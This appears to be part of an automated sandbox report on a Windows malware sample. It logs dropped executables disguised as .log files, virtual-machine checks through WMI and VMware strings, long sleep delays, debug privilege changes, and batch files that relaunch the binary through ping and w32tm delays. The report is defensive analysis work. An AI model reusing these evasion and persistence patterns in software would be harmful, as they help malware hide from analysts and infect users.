Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yaIZBZii.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GTNiEPlU.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LQfwyfBd.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bNbWVinF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dkrUwkwy.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\saTzkgPu.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sWxBtiEz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IimQJXBp.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VmFPHYcT.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tuDcNqgt.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lkPRlAvL.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RQVXPZTR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vqKsIEwO.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\utjkmEhT.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TpEwEWgR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QkZgZWxz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vodJuMXp.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\INvIQzWs.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZUMnkmBH.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JPUzzdBp.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PpJWzvoC.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SwMdNZCQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\drJTdJeQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XkYexKxm.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ecVtFGvr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GhhRBgVS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SKDxcIEq.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QynQebMf.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\spVQuoXR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xchRfZTn.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eMbVZMhw.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uNikKqFs.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EvoHLreS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KGLrCwIr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OKWQGJri.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tLQsTXtO.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BXrbSTCJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gAtVyfCt.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mGJtKjSH.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JiGGnouG.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pQzkpSqZ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DHkzZdjU.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zGAgyZQh.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DVKqIFYb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\adtLbSCC.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sfUBdVXw.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xDZbRmFl.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jZEuaeKK.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RDLnOhqQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cGGcCHge.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SmsYQpId.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CpJqgrwA.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DzuiDjow.log	Jump to dropped file

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe TID: 7368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 7884	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 7640	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 1368	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 8172	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 7432	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 6720	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 7652	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 2416	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 8084	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 7924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 3868	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 6952	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 5340	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 8180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 2920	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 1640	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 4556	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\axnJvpyQnMRKSw.exe TID: 5924	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: axnJvpyQnMRKSw.exe, 0000001A.00000002.2233548129.000000001B78A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_p
Source: axnJvpyQnMRKSw.exe, 0000002C.00000002.2624188199.000000001AF91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
Source: axnJvpyQnMRKSw.exe, 0000000E.00000002.1999814210.000000001B7A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: axnJvpyQnMRKSw.exe, 00000020.00000002.2365797037.000000001CCF6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft TC+~
Source: w32tm.exe, 00000019.00000002.2109477264.000001D0D0699000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: axnJvpyQnMRKSw.exe, 00000026.00000002.2475913340.000000001C9D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\R
Source: axnJvpyQnMRKSw.exe, 0000001A.00000002.2229763516.000000001B10D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.
Source: axnJvpyQnMRKSw.exe, 00000014.00000002.2128854198.000000001CFBB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x
Source: axnJvpyQnMRKSw.exe, 00000033.00000002.2594691011.0000000001189000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: axnJvpyQnMRKSw.exe, 00000014.00000002.2128854198.000000001CFBB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\[.
Source: axnJvpyQnMRKSw.exe, 00000020.00000002.2287268310.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: axnJvpyQnMRKSw.exe, 00000005.00000002.1908884456.000000001B630000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000B.00000002.1916571254.000001F812267000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000000E.00000002.1968412199.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000013.00000002.2019461545.0000024730127000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000014.00000002.2121077957.000000001BDE0000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000001A.00000002.2233548129.000000001B78A000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2365797037.000000001CCF6000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000025.00000002.2337952614.0000022AD6979000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2462454570.000000001B830000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000031.00000002.2532256678.000001EB47CD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process token adjusted: Debug
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process token adjusted: Debug
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process token adjusted: Debug
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process token adjusted: Debug
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process token adjusted: Debug
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process token adjusted: Debug
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0jztGmSOAj.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\O2a76Ow1QW.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6KfhU02lmW.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dYHSyFVcIa.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\k9Xkw6Am4N.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RHLnW0oZVx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5xIcrgADPl.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gXPzuBRgcB.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VW6Uh1R2rX.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
